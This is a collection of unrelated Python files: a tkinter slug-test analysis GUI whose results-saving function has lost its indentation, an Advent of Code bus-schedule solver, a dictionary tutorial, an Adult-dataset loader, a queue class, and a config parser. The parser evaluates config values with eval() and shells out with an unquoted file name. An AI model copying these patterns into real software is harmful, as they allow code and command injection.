                self.PlotRegRes_B.savefig(self.listNamesRepMeas_TH[self.batchfile+1] + '_RegressionPlot' + '.pdf', bbox_inches='tight')
            self.ResultsKB_all=self.ResultsKB_all.fillna(" \ ") # instead of nan, '\' will be displayed in the results table for the non-calculated values
            # save K results to excel
            filenameResult_Batch=tk.filedialog.asksaveasfilename(title= 'Save as', confirmoverwrite=True, initialdir=self.newDirectory)
            self.ResultsKB_all.to_excel(filenameResult_Batch + '_Kh.xlsx')
        except ValueError:
            tk.messagebox.showerror("Warning", "The calculations cannot be performed! \nCheck if all needed parameters are given and in the correct (float) format. \nThere might be calculation methods which are not applicable.")
# save the hydraulic conductivity, H0 and T0 results in a text file and the regression figure as pdf
def SaveResults(self):
# making a text file with the results and a summary of the parameters
filenameResult=tk.filedialog.asksaveasfilename(title= 'Save as', confirmoverwrite=True, initialdir=self.newDirectory)
logText=[]
logText='\n'.join(['____________________________________________________________\n', ' Logfile Slug Test Analysis Script' , '____________________________________________________________', ' ','RSAT 0.2.2' ,' '.join(['Time:',time.strftime("%a, %d %b %Y %H:%M:%S ")]), 'Filename: '+self.filename+'\n', 'Units: same as observation data. \n'])
logText = logText + '\nMinimal/maximal head: '+ '%.2f'%self.StartHead + ' [L]\n'
logText = logText + 'Equilibrium Head: '+ '%.2f'%self.BaseLevel + ' [L]\n' + 'Initial Displacement H0: '+ '%.2f'%self.H0 + ' [L]\n\n'
# write the parameters
logText= logText + '____________________________________________________________\n\n' +' SLUG TEST CHARACTERISTICS\n'+'____________________________________________________________\n\n'+ 'Rc: '+'%.5f' % (self.rc)+' [L]\n'+'Rw: '+'%.5f' % (self.rw)+' [L]\n' + 'd: '+ '%.5f'%(self.d) + ' [L]\n'+ 'Le: '+ '%.5f' %(self.Le)+ ' [L]\n\n'
logText= logText +'____________________________________________________________\n\n' + ' AQUIFER CHARACTERISTICS\n'+'____________________________________________________________\n\n' + 'Aquifer thickness: '+'%.5f' % (self.AqThick) + ' [L]\n' + 'Anisotropy ratio Kh/Kv: ' + '%.5f'%(self.Aniso) +' [-] \n\n'
#write the results for Bouwer & Rice
if (V1.get()== True) or (V2.get()== True) or (V3.get()== True):
logText = logText + '____________________________________________________________\n\n' +' BOUWER & RICE - fully penetrating \n'+'____________________________________________________________\n\n'
if V1.get()== True:
logText = logText + 'a) Calculation based on normalized head data in interval 0.20-0.30:\n\n' + 'H0+ = '+ '%.2f'%(self.ResultsH0T0.iloc[0,0]) + ' [L]\n' + 'T0+ = ' + '%.1f'%(self.ResultsH0T0.iloc[1,0]) + ' [T]\n\n' + 'Kh = ' + '%.5f'%self.ResultsK.iloc[0,0] + ' [L/T]\n\n'
if V2.get()== True:
logText = logText + 'b) Calculation based on normalized head data in interval 0.3-1:\n\n' + 'H0+ = '+ '%.2f'%(self.ResultsH0T0.iloc[2,0]) + ' [L]\n' + 'T0+ = ' + '%.1f'%(self.ResultsH0T0.iloc[3,0]) + ' [T]\n\n' + 'Kh = ' + '%.5f'%self.ResultsK.iloc[1,0] + ' [L/T]\n\n'
if V3.get()==True:
logText = logText + 'c) Calculation based on all head data:\n\n' + 'H0 = '+ '%.2f'%(self.ResultsH0T0.iloc[4,0]) + ' [L]\n' + 'T0 = ' + '%.1f'%(self.ResultsH0T0.iloc[5,0]) + ' [T]\n\n' + 'Kh = ' + '%.5f'%self.ResultsK.iloc[2,0] + ' [L/T]\n\n'
if (V4.get()== True) or (V5.get()== True) or (V6.get()== True):
logText = logText +'____________________________________________________________\n\n' + ' BOUWER & RICE - partially penetrating \n'+'____________________________________________________________\n\n'
if V4.get()== True:
logText = logText + 'a) Calculation based on normalized head data in interval 0.20-0.30:\n\n' + 'H0+ = '+ '%.2f'%(self.ResultsH0T0.iloc[0,1]) + ' [L]\n' + 'T0+ = ' + '%.1f'%(self.ResultsH0T0.iloc[1,1]) + ' [T]\n\n' + 'Kh = ' + '%.5f'%self.ResultsK.iloc[0,1] + ' [L/T]\n\n'
if V5.get()== True:
logText = logText + 'b) Calculation based on normalized head data in interval 0.3-1:\n\n' + 'H0+ = '+ '%.2f'%(self.ResultsH0T0.iloc[2,1]) + ' [L]\n' + 'T0+ = ' + '%.1f'%(self.ResultsH0T0.iloc[3,1]) + ' [T]\n\n' + 'Kh = ' + '%.5f'%self.ResultsK.iloc[1,1] + ' [L/T]\n\n'
if V6.get()==True:
logText = logText + 'c) Calculation based on all head data:\n\n' + 'H0 = '+ '%.2f'%(self.ResultsH0T0.iloc[4,1]) + ' [L]\n' + 'T0 = ' + '%.1f'%(self.ResultsH0T0.iloc[5,1]) + ' [T]\n\n' + 'Kh = ' + '%.5f'%self.ResultsK.iloc[2,1] + ' [L/T]\n\n'
if (V10.get()== True) or (V11.get()== True) or (V12.get()== True):# see above
logText = logText +'____________________________________________________________\n\n' + 'HVORSLEV - Fully penetrating \n'+'____________________________________________________________\n\n'
if V10.get()== True:
logText = logText + 'a) Calculation based on normalized head data in interval 0.15-0.25:\n\n' + 'H0+ = '+ '%.2f'%(self.ResultsH0T0.iloc[0,3]) + ' [L]\n' + 'T0+ = ' + '%.1f'%(self.ResultsH0T0.iloc[1,3]) + ' [T]\n\n' + 'Kh = ' + '%.5f'%self.ResultsK.iloc[0,3] + ' [L/T]\n\n'
if V11.get()== True:
logText = logText + 'b) Calculation based on normalized head data in interval 0.3-1:\n\n' + 'H0+ = '+ '%.2f'%(self.ResultsH0T0.iloc[2,3]) + ' [L]\n' + 'T0+ = ' + '%.1f'%(self.ResultsH0T0.iloc[3,3]) + ' [T]\n\n' + 'Kh = ' + '%.5f'%self.ResultsK.iloc[1,3] + ' [L/T]\n\n'
if V12.get()==True:
logText = logText + 'c) Calculation based on all head data:\n\n' + 'H0 = '+ '%.2f'%(self.ResultsH0T0.iloc[4,3]) + ' [L]\n' + 'T0 = ' + '%.1f'%(self.ResultsH0T0.iloc[5,3]) + ' [T]\n\n' + 'Kh = ' + '%.5f'%self.ResultsK.iloc[2,3] + ' [L/T]\n\n'
# write the results for hvorslev-partially penetrating
if (V7.get()== True) or (V8.get()== True) or (V9.get()== True):# see above
logText = logText +'____________________________________________________________\n\n' + ' HVORSLEV - Partially penetrating\n'+'____________________________________________________________\n\n'
if V7.get()== True:
logText = logText + 'a) Calculation based on normalized head data in interval 0.15-0.25:\n\n' + 'H0+ = '+ '%.2f'%(self.ResultsH0T0.iloc[0,2]) + ' [L]\n' + 'T0+ = ' + '%.1f'%(self.ResultsH0T0.iloc[1,2]) + ' [T]\n\n' + 'Kh = ' + '%.5f'%self.ResultsK.iloc[0,2] + ' [L/T]\n\n'
if V8.get()== True:
logText = logText + 'b) Calculation based on normalized head data in interval 0.3-1:\n\n' + 'H0+ = '+ '%.2f'%(self.ResultsH0T0.iloc[2,2]) + ' [L]\n' + 'T0+ = ' + '%.1f'%(self.ResultsH0T0.iloc[3,2]) + ' [T]\n\n' + 'Kh = ' + '%.5f'%self.ResultsK.iloc[1,2] + ' [L/T]\n\n'
if V9.get()==True:
logText = logText + 'c) Calculation based on all head data:\n\n' + 'H0 = '+ '%.2f'%(self.ResultsH0T0.iloc[4,2]) + ' [L]\n' + 'T0 = ' + '%.1f'%(self.ResultsH0T0.iloc[5,2]) + ' [T]\n\n' + 'Kh = ' + '%.5f'%self.ResultsK.iloc[2,2] + ' [L/T]\n\n'
with open(filenameResult, 'w') as output:
output.write(logText)
# saving a pdf with the regression plots
self.PlotRegRes.savefig(filenameResult + '_RegressionPlot' + '.pdf', bbox_inches='tight')
# save the results table to an excel
self.ResultsK.to_excel(filenameResult+ '_K.xlsx')
###############################################################################
###################################### MAIN ###################################
###############################################################################
################ creating GUI, structure, title and refer to authors ##########
GUI = tk.Tk()
GUI.configure(background= '#15344E')
GUI.title('RSAT 0.2.2')
GUI.geometry('1070x700')
# base row/column offsets shared by every grid() call below
i=8
j=15
tk.Label(GUI, text='RSAT 0.2.2 - Rising head Slug test Analysis Tool',font=("Helvetica", "18"), fg='white',height='3',background='#15344E').grid(row=i-8, column=j, columnspan=7)
tk.Label(GUI, text='Authors: Annabel Vaessens and Gert Ghysels. License: MIT',font=("Helvetica", "8"),fg='white', background='#15344E').grid(row=i+16, column=j+3, columnspan=10, sticky='W')
# blank labels act as grid spacers that shape the layout
tk.Label(GUI, text=' ', width=10,fg='white', background='#15344E').grid(row=i, column=j+2)
tk.Label(GUI, text=' ', width=10,fg='white', background='#15344E').grid(row=i, column=j+1)
tk.Label(GUI, text=' ', width=8, fg='white', background='#15344E').grid(row=i, column=j-1)
#tk.Label(GUI, text=' ', height=1, fg='white', background='#15344E').grid(row=i+5, column=j, columnspan=7)
tk.Label(GUI, text=' ', height=1, fg='white', background='#15344E').grid(row=i+3, column=j, columnspan=7)
tk.Label(GUI, text=' ', height=1, fg='white', background='#15344E').grid(row=i+12, column=j-1)
tk.Label(GUI, text=' ', height=1, fg='white', background='#15344E').grid(row=i+15, column=j+3, columnspan=7)
tk.Label(GUI, text='', width=13, fg='white', background='#15344E').grid(row=i-1, column=4+j) # set width of column 4+j to 13
p=Program() # instance of the Program class (defined earlier in this file) holding all callbacks
########################## FALLING VS RISING HEAD #############################
tk.Label(GUI, text='Falling or rising head slug test', font=("Helvetica", "14"), fg='white',background='#15344E').grid(row=i-7, column=j, columnspan=1, sticky='W')
# STlabel holds the selected test type: 'F' (falling head, default) or 'R' (rising head)
STlabel=tk.StringVar()
STlabel.set('F')
#tk.Checkbutton(GUI, variable=STlabel, indicatoron=0, width=18, textvariable=STlabel, onvalue='Falling head', offvalue='Rising head', font= ("Helvetica", "10",'bold'),foreground='white', activebackground='#2A6496' , background='#2A6496').grid(row=i-6, column=j)
# two mutually exclusive "button style" radio buttons (indicatoron=0)
modes=[('Falling head', 'F', 0),('Rising head', 'R',1)]
for text, mode, number in modes:
    b = tk.Radiobutton(GUI, text=text,indicatoron=0, variable=STlabel, width=18, value=mode, background='#2A6496', fg='black', font=("Helvetica", "10", "bold"))
    b.grid(row=i-6+number, column=j)
########################## DIRECTORY AND OPEN FILE ############################
tk.Label(GUI, text='Working directory & data',font=("Helvetica", "14"), fg='white',background='#15344E').grid(row=i-3, column=j, columnspan=1, sticky='W')
# button to change the output directory
tk.Button(GUI, text="Output directory", command=p.newDirectory, font=("Helvetica", "10",'bold'), fg='white',width=18, bg='#2A6496').grid(row=i-2, column=j)
# button to import a data file
tk.Button(GUI, text="Data file", font=("Helvetica", "10",'bold'), fg='white', command=p.OpenFile,width=18, bg='#2A6496').grid(row=i, column=j)
# button to plot a head (L) - time (s) curve in a pop-up window
tk.Button(GUI,text="Plot", command=p.PlotDataSeperateBox, font=("Helvetica", "10",'bold'), fg='white', width=18, bg='#2A6496').grid(row=i+2, column=j)
########################### SPLITTING RAW DATA ################################
# an entry to enter how many measurements there are in the imported file
tk.Label(GUI, text='Splitting raw data',fg='white', font=("Helvetica", "14"), background='#15344E').grid(row=i+4, column=j, columnspan=1, sticky='W')
tk.Label(GUI, text=' # measurements: ',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=i+5, column=j, sticky='W')
NM=tk.IntVar()
# NOTE(review): .grid() returns None, so NumberMeas is always None; the
# entered value is accessible through the NM variable instead
NumberMeas=tk.Entry(GUI,textvariable=NM, width=8).grid(row=i+5, column=j, sticky='E')
# button to define the boundaries of individual measurements in the clickable graph
tk.Button(GUI, text='Boundaries', command=p.ClickableGraph, font=("Helvetica", "10",'bold'), fg='white', width=18, bg='#2A6496').grid(row=i+7, column=j)
# button to split the data file into individual measurements
tk.Button(GUI, text='Split data',command=p.SplitRawData, font=("Helvetica", "10",'bold'), fg='white', width=18, bg='#2A6496').grid(row=i+8, column=j)
########################### CHECK REPEATABILITY ###############################
# label and button to open multiple files in order to check repeatability on normalized head - time curves
tk.Label(GUI,text='Normalized head curves',fg='white', font=("Helvetica", "14"), background='#15344E').grid(row=i+10, column=j,columnspan=1, sticky='W')
tk.Button(GUI, text='Choose files', command=p.RepeatabilityOpen, font=("Helvetica", "10",'bold'), fg='white', width=18, bg='#194469').grid(row=i+11, column=j)
# button to plot normalized head vs time curves (linear axes)
tk.Button(GUI, text='Versus time - linear', command= p.PlotNormHead_Time ,font=("Helvetica", "10",'bold'), fg='white', width=18, bg='#194469').grid(row=i+12, column=j)
# button to plot normalized head vs log(time) curves
tk.Button(GUI, text='Versus time - semilog', command= p.PlotNormHead_LogTime ,font=("Helvetica", "10",'bold'), fg='white', width=18, bg='#194469').grid(row=i+13, column=j)
# button for batch calculation over all opened measurements
# tk.Label(GUI,text='Batch calculation',fg='white', font=("Helvetica", "12"), background='#15344E').grid(row=i+12, column=j,columnspan=1, sticky='W')
tk.Button(GUI, text='Batch calculation', command=p.BatchCalc, font=("Helvetica", "10",'bold'), fg='white', width=14, bg='#194469').grid(row=i+13, column=4+j, columnspan=3)
###################### PARAMETERS for calculations #############################
# all parameter entries are StringVars; they are cast to float inside the
# calculation methods (a bad value raises ValueError there)
# aquifer characteristics entries
tk.Label(GUI, text='Aquifer characteristics',fg='white', font=("Helvetica", "14"), background='#15344E').grid(row=i, column=3+j,columnspan=3, sticky='W')
tk.Label(GUI, text='Anisotropy Kh/Kv',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=i+1, column=3+j, sticky='W')
tk.Label(GUI, text='[-]',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=i+1, column=5+j, sticky='W')
ANISO=tk.StringVar()
tk.Entry(GUI, textvariable=ANISO, width=8).grid(row=i+1, column=4+j)
tk.Label(GUI, text='Thickness of aquifer',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=i+2, column= 3+j, sticky='W')
tk.Label(GUI, text='[L]',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=i+2, column=5+j, sticky='W')
AQTHICK=tk.StringVar()
tk.Entry(GUI, textvariable=AQTHICK, width=8).grid(row=i+2, column=4+j)
# slug test characteristics entries
tk.Label(GUI, text='Slug test characteristics',fg='white', font=("Helvetica", "14"), background='#15344E').grid(row=i-7, column=j+3,columnspan=3, sticky='W')
tk.Label(GUI, text='rc - Effective radius well casing',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=i-6, column=3+j, sticky='W')
tk.Label(GUI, text='[L]',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=i-6, column=5+j, sticky='W')
RC=tk.StringVar()
tk.Entry(GUI, textvariable=RC, width=8).grid(row=i-6, column=j+4)
tk.Label(GUI, text='Le - Effective screen length',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=i-5, column=3+j, sticky='W')
tk.Label(GUI, text='[L]',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=i-5, column=5+j, sticky='W')
LE=tk.StringVar()
tk.Entry(GUI, textvariable=LE, width=8).grid(row=i-5, column=j+4)
tk.Label(GUI, text='rw - Effective radius well screen',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=i-4, column=3+j, sticky='W')
tk.Label(GUI, text='[L]',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=i-4, column=5+j, sticky='W')
RW=tk.StringVar()
tk.Entry(GUI, textvariable=RW, width=8).grid(row=i-4, column=4+j)
tk.Label(GUI, text='d - z-position of top of screen',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=i-3, column=3+j, sticky='W')
tk.Label(GUI, text='[L]',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=i-3, column=5+j, sticky='W')
D=tk.StringVar()
tk.Entry(GUI, textvariable=D, width=8).grid(row=i-3, column=4+j)
tk.Label(GUI, text='Re - effective radius parameter',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=i-2, column=3+j, sticky='W')
tk.Label(GUI, text='[L]',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=i-2, column=5+j, sticky='W')
RE=tk.StringVar()
tk.Entry(GUI, textvariable=RE, width=8).grid(row=i-2, column=4+j)
################# CALCULATION OPTIONS + CALCULATIONS ###########################
# 12 check boxes for the different calculation options:
#   V1-V3   Bouwer & Rice, fully penetrating    (best range / no full recovery / all data)
#   V4-V6   Bouwer & Rice, partially penetrating
#   V7-V9   Hvorslev, fully penetrating
#   V10-V12 Hvorslev, partially penetrating
tk.Label(GUI, text='Horizontal hydraulic conductivity',fg='white', font=("Helvetica", "14"), background='#15344E').grid(row=6+i, column=j+3, columnspan=1, sticky='W')
tk.Button(GUI, text='Limitations', command=p.CheckLimitations, fg='white', font=("Helvetica", "10",'bold'),width=10, bg='#2A6496').grid(row=13+i, column=3+j, sticky='W', columnspan=1)
tk.Label(GUI, text='Bouwer & Rice, fully penetrating',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=8+i, column=3+j, sticky='W')
tk.Label(GUI, text='Best range',fg='white', font=("Helvetica", "10"), background='#15344E').grid(row=8+i, column=4+j, sticky='E')
V1=tk.IntVar()
tk.Checkbutton(GUI, variable=V1, background='#15344E').grid(row=8+i, column=4+j, sticky='W')
tk.Label(GUI, text='No full recovery',fg='white', font=("Helvetica", "10"), background='#15344E').grid(row=8+i, column=6+j, sticky='W')
V2=tk.IntVar()
tk.Checkbutton(GUI, variable=V2, background='#15344E').grid(row=8+i, column=5+j, sticky='E')
tk.Label(GUI, text='All data',fg='white', font=("Helvetica", "10"), background='#15344E').grid(row=8+i, column=9+j, sticky='W')
V3=tk.IntVar()
tk.Checkbutton(GUI, variable=V3, background='#15344E').grid(row=8+i, column=8+j, sticky='E')
tk.Label(GUI, text='Bouwer & Rice, partially penetrating',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=9+i, column=3+j, sticky='W')
tk.Label(GUI, text='Best range',fg='white', font=("Helvetica", "10"), background='#15344E').grid(row=9+i, column=4+j, sticky='E')
V4=tk.IntVar()
tk.Checkbutton(GUI, variable=V4, background='#15344E').grid(row=9+i, column=4+j, sticky='W')
tk.Label(GUI, text='No full recovery',fg='white', font=("Helvetica", "10"), background='#15344E').grid(row=9+i, column=6+j, sticky='W')
V5=tk.IntVar()
tk.Checkbutton(GUI, variable=V5, background='#15344E').grid(row=9+i, column=5+j, sticky='E')
tk.Label(GUI, text='All data',fg='white', font=("Helvetica", "10"), background='#15344E').grid(row=9+i, column=9+j, sticky='W')
V6=tk.IntVar()
tk.Checkbutton(GUI, variable=V6, background='#15344E').grid(row=9+i, column=8+j, sticky='E')
tk.Label(GUI, text='Hvorslev, fully penetrating',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=10+i, column=3+j, sticky='W')
tk.Label(GUI, text='Best range',fg='white', font=("Helvetica", "10"), background='#15344E').grid(row=10+i, column=4+j, sticky='E')
V7=tk.IntVar()
tk.Checkbutton(GUI, variable=V7, background='#15344E').grid(row=10+i, column=4+j, sticky='W')
tk.Label(GUI, text='No full recovery',fg='white', font=("Helvetica", "10"), background='#15344E').grid(row=10+i, column=6+j, sticky='W')
V8=tk.IntVar()
tk.Checkbutton(GUI, variable=V8, background='#15344E').grid(row=10+i, column=5+j, sticky='E')
tk.Label(GUI, text='All data',fg='white', font=("Helvetica", "10"), background='#15344E').grid(row=10+i, column=9+j, sticky='W')
V9=tk.IntVar()
tk.Checkbutton(GUI, variable=V9, background='#15344E').grid(row=10+i, column=8+j, sticky='E')
tk.Label(GUI, text='Hvorslev, partially penetrating',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=11+i, column=3+j, sticky='W')
tk.Label(GUI, text='Best range',fg='white', font=("Helvetica", "10"), background='#15344E').grid(row=11+i, column=4+j, sticky='E')
V10=tk.IntVar()
tk.Checkbutton(GUI, variable=V10, background='#15344E').grid(row=11+i, column=4+j, sticky='W')
tk.Label(GUI, text='No full recovery',fg='white', font=("Helvetica", "10"), background='#15344E').grid(row=11+i, column=6+j, sticky='W')
V11=tk.IntVar()
tk.Checkbutton(GUI, variable=V11, background='#15344E').grid(row=11+i, column=5+j, sticky='E')
tk.Label(GUI, text='All data',fg='white', font=("Helvetica", "10"), background='#15344E').grid(row=11+i, column=9+j, sticky='W')
V12=tk.IntVar()
tk.Checkbutton(GUI, variable=V12, background='#15344E').grid(row=11+i, column=8+j, sticky='E')
# button to perform the calculations for a single file
tk.Button(GUI, text='Calculate', command=p.PerformCalc, fg='white', font=("Helvetica", "10",'bold'), width=10, bg='#2A6496').grid(row=13+i, column=3+j, columnspan=1)
# button to save the results
tk.Button(GUI, text='Save', command=p.SaveResults, fg='white', font=("Helvetica", "10",'bold'), width=10, bg='#2A6496').grid(row=13+i, column=3+j, columnspan=1, sticky='E')
# button to close the GUI
tk.Button(GUI, text="Close", command=GUI.destroy,fg='white', font=("Helvetica", "10",'bold'), width=10, bg='#2A6496').grid(row=i+13, column=j+6, columnspan=4, sticky='E')
tk.mainloop( ) # keeps the GUI open
|
import re
class AdventOfCode:
    """Advent of Code 2020, day 13: shuttle bus schedules.

    The input file holds the earliest departure timestamp on line 1 and a
    comma-separated bus list on line 2, where 'x' marks an out-of-service
    slot whose positional offset still matters for part 2.
    """

    def __init__(self, filename):
        """Read *filename* and collect (offset, bus_id) pairs in self.times."""
        with open(filename) as f:
            self.input = f.read().splitlines()
        self.times = [(offset, int(bus))
                      for offset, bus in enumerate(self.input[1].split(','))
                      if bus != 'x']

    def part1(self):
        """Return wait_minutes * bus_id for the first bus departing at or after t0.

        Fix: the original used an arbitrary sentinel (1_000_000_000) and a
        manual min-loop; if no wait beat the sentinel it silently returned 0.
        Now min() is used directly; an empty bus list raises ValueError.
        """
        t0 = int(self.input[0])

        def wait(bus_id):
            # minutes until the next multiple of bus_id at or after t0
            rem = t0 % bus_id
            return bus_id - rem if rem else 0

        best = min((bus_id for _, bus_id in self.times), key=wait)
        return wait(best) * best

    def part2(self):
        """Return the earliest timestamp t where every bus with offset k departs at t+k.

        Sieve approach (Chinese-remainder style): step by the product of the
        periods already satisfied; once a bus matches it keeps matching every
        `interval` steps because the bus periods are coprime in AoC input.
        """
        n = 0
        interval = self.times[0][1]
        remaining = set(self.times[1:])
        while remaining:
            n += interval
            # iterate over a snapshot so we may remove matches during the loop
            for bus in list(remaining):
                offset, bus_id = bus
                if (n + offset) % bus_id == 0:
                    remaining.remove(bus)
                    interval *= bus_id
        return n
|
# A dict maps keys to values: {key: value, ...}
my_dict = {"name": "Farjad", "age": 30, "gender": "Male"}
print(len(my_dict))          # number of key/value pairs
print(my_dict.keys())        # view of the keys
print(my_dict.get("name"))   # .get() returns None instead of raising for missing keys
print(my_dict.values())      # view of the values
print(my_dict.items())       # view of (key, value) pairs
# adding a new entry
my_dict["email"] = "farjad@gmail.com"
print(my_dict["email"])
# assigning to an existing key overwrites its value
my_dict["email"] = "ali@gmail.com"
print(my_dict["email"])
# membership test looks at the keys
print("email" in my_dict)
# removing an entry
del my_dict["email"]
print(my_dict)
# iterating over keys
for key in my_dict.keys():
    print(key)
# iterating over values
for value in my_dict.values():
    print(value)
# adult.py
import torch
import scipy.io as sio
import pytorch_lightning as pl
from torch.utils.data import DataLoader
class PrepareAdult(pl.LightningDataModule):
    """Map-style dataset wrapper for the binary Adult census data in `adult_binary.mat`.

    After construction:
      x: (n_samples, n_features) float tensor
      y: (n_samples,) long tensor of labels
      s: (n_samples, 1) float tensor — the protected attribute taken from
         feature row 71 of the raw matrix (presumably gender — TODO confirm
         against the .mat layout)
    """

    def __init__(self, root, split):
        """Load the split ('train', 'val' or 'test'); 'val' shares the test matrices.

        Raises ValueError for an unknown split (the original duplicated the
        whole body per split and silently produced a broken object otherwise).
        """
        # NOTE(review): no super().__init__() call, as in the original; the
        # class is used as a plain dataset despite the LightningDataModule base.
        self.data = sio.loadmat(root + 'adult_binary.mat')
        # The splits only differ in which matrices of the .mat file are read.
        if split == 'train':
            x_key, y_key = 'D', 'Y'
        elif split in ('test', 'val'):
            x_key, y_key = 'D_test', 'Y_test'
        else:
            raise ValueError('unknown split: {!r}'.format(split))
        x = torch.from_numpy(self.data[x_key]).float()   # raw layout: (features, samples)
        y = torch.from_numpy(self.data[y_key]).long().squeeze()
        s = x[71, :]                      # protected-attribute feature row
        self.x = torch.t(x)               # transpose to (samples, features)
        self.y = torch.t(y)               # no-op for a 1-D tensor, kept as in the original
        self.s = torch.t(s).unsqueeze(1)  # (samples, 1)

    def __len__(self):
        """Number of samples in the split."""
        return len(self.x)

    def __getitem__(self, index):
        """Return (features, label, protected attribute) for one sample."""
        x, y, s = self.x[index], self.y[index], self.s[index]
        return x, y, s
class Adult(pl.LightningDataModule):
    """LightningDataModule exposing train/val/test DataLoaders over PrepareAdult.

    The three dataloader methods previously duplicated the DataLoader
    construction; it is now shared in _make_loader (public interface unchanged).
    """

    def __init__(self, opts):
        """Store options; pin host memory only when GPUs are in use (opts.ngpu != 0)."""
        super().__init__()
        self.opts = opts
        self.pin_memory = opts.ngpu != 0

    def _make_loader(self, split, batch_size, shuffle):
        """Build a DataLoader for one split (shared by train/val/test)."""
        return DataLoader(
            dataset=PrepareAdult(self.opts.dataroot, split),
            batch_size=batch_size,
            shuffle=shuffle,
            num_workers=self.opts.nthreads,
            pin_memory=self.pin_memory,
        )

    def train_dataloader(self):
        """Shuffled loader over the training split."""
        return self._make_loader('train', self.opts.batch_size_train, True)

    def val_dataloader(self):
        """Deterministic loader over the validation split."""
        return self._make_loader('val', self.opts.batch_size_test, False)

    def test_dataloader(self):
        """Deterministic loader over the test split."""
        return self._make_loader('test', self.opts.batch_size_test, False)
|
from collections import deque
class Shop:
    """Single-server shop: a bounded FIFO queue of waiting customers plus a
    `Max` marker holding the time the current service finishes (0 = idle)."""

    Max = 0  # finish time of the customer being served; 0 means server free

    def __init__(self):
        # FIFO of waiting customers, capped at 10 by add_Queue().
        self.Queue = deque()

    def add_Queue(self, object):
        """Enqueue a customer; refuse (return False) when 10 are waiting."""
        if len(self.Queue) == 10:
            return False
        self.Queue.append(object)
        return True

    def get_Queue(self):
        """Expose the underlying deque of waiting customers."""
        return self.Queue

    def attend(self, time):
        """Free the server when the current service ends exactly at `time`."""
        if self.Max == time:
            self.Max = 0

    def status_queue(self):
        """True when nobody is waiting."""
        return len(self.Queue) == 0

    def status(self):
        """True when the server is idle (no finish time pending)."""
        return self.Max == 0
"""
#############################################################################################################
Utilities for handling command-line arguments, and for parsing configuration files.
The config files should be textual, in which each line can contain:
- a comment, starting with char '#'
- an empty line
- the name of the variable and its value, separated with tab or spaces
The content of config files should be fed to the config dictionaries in the main python scripts.
alex 2019
#############################################################################################################
"""
import os
import sys
import argparse
import mesg as ms
from arch import layer_code
DEBUG0 = False # enable debugging print
DEBUG1 = False
def get_args():
    """Parse the command-line flags of a training run.

    Returns a dict keyed by the option dest names (CONFIG, LOAD, TRAIN,
    REDIRECT, ARCHIVE, GPU, FGPU).
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('-c', '--config', action='store', dest='CONFIG', type=str, required=True,
                        help="Config file describing the model architecture and training parameters")
    parser.add_argument('-l', '--load', action='store', dest='LOAD', type=str, default=None,
                        help="Folder or HDF5 file to load as weights or entire model")
    parser.add_argument('-T', '--train', action='store_true', dest='TRAIN',
                        help="Execute training of the model")
    parser.add_argument('-r', '--redir', action='store_true', dest='REDIRECT',
                        help="Redirect stderr and stdout to log file")
    # 'count' lets -s be repeated: -s archives configs, -ss also the scripts.
    parser.add_argument('-s', '--save', action='count', dest='ARCHIVE', default=0,
                        help="Archive config files [-s] and python scripts [-ss]")
    parser.add_argument('-g', '--gpu', action='store', dest='GPU', required=True,
                        help="Number of GPUs to use (0 if CPU) or list of GPU indices")
    parser.add_argument('-f', '--fgpu', action='store', dest='FGPU', type=float, default=0.90,
                        help="Fraction of GPU memory to allocate")
    return vars(parser.parse_args())
def get_args_eval():
    """Parse the command-line flags of exec_eval.py.

    All options are optional and default to None; returns a dict keyed by
    the dest names (MODEL, MODELS, IMAGE, IMAGES).
    """
    parser_e = argparse.ArgumentParser()
    parser_e.add_argument('-m', '--model', action='store', dest='MODEL', type=str,
                          required=False, default=None,
                          help="Pathname of folder containing the model result")
    parser_e.add_argument('-l', '--list', action='store', dest='MODELS', type=str,
                          required=False, default=None,
                          help="List of pathnames of several folders of models result")
    parser_e.add_argument('-i', '--img', action='store', dest='IMAGE', type=str,
                          required=False, default=None,
                          help="Pathname of image file to use as input for prediction")
    parser_e.add_argument('-s', '--seqs', action='store', dest='IMAGES', type=str,
                          required=False, default=None,
                          help="List of pathnames of image folders image to use as input for prediction")
    return vars(parser_e.parse_args())
def get_config( fname ):
    """ -----------------------------------------------------------------------------------------------------
    Return the content of a config file in the form of a dictionary
    fname: [str] path of config file
    return: [dict] content of the file
    ----------------------------------------------------------------------------------------------------- """
    cnfg = dict()
    if not os.path.isfile( fname ):
        ms.print_err( "Configuration file \"{}\" not found.".format( fname ) )
    if DEBUG0:
        # NOTE(review): cnfg is still empty here, so cnfg['log_msg'] raises
        # KeyError whenever DEBUG0 is enabled — confirm the intended
        # ms.print_msg arguments.
        ms.print_msg( cnfg[ 'log_msg' ], "Reading configuration file \"{}\".\n".format( fname ) )
        os.system( "cat %s" % fname )
    with open( fname ) as doc:
        for line in doc:
            if line[ 0 ] == '#': continue       # comment line
            if DEBUG1:
                print( line )
            c = line.split( '#' )[ 0 ]          # remove any following comment
            c = c.split()                       # -> [name, value tokens...]
            if len( c ) == 0: continue          # empty line
            # WARNING: eval() executes arbitrary code from the config file —
            # only feed it trusted files (values may reference imported names
            # such as layer_code).  Tokens after the name are joined so a
            # value may contain spaces.
            cnfg[ c[ 0 ] ] = eval( str().join( c[ 1: ] ) )
    return cnfg
def load_config( cnfg, dest ):
    """ -----------------------------------------------------------------------------------------------------
    Overwrite the values of dest with those of cnfg, for every key the two
    dictionaries have in common
    cnfg: [dict] one with all configs
    dest: [dict] one to be filled
    ----------------------------------------------------------------------------------------------------- """
    for key in dest:
        if key in cnfg:
            dest[ key ] = cnfg[ key ]
|
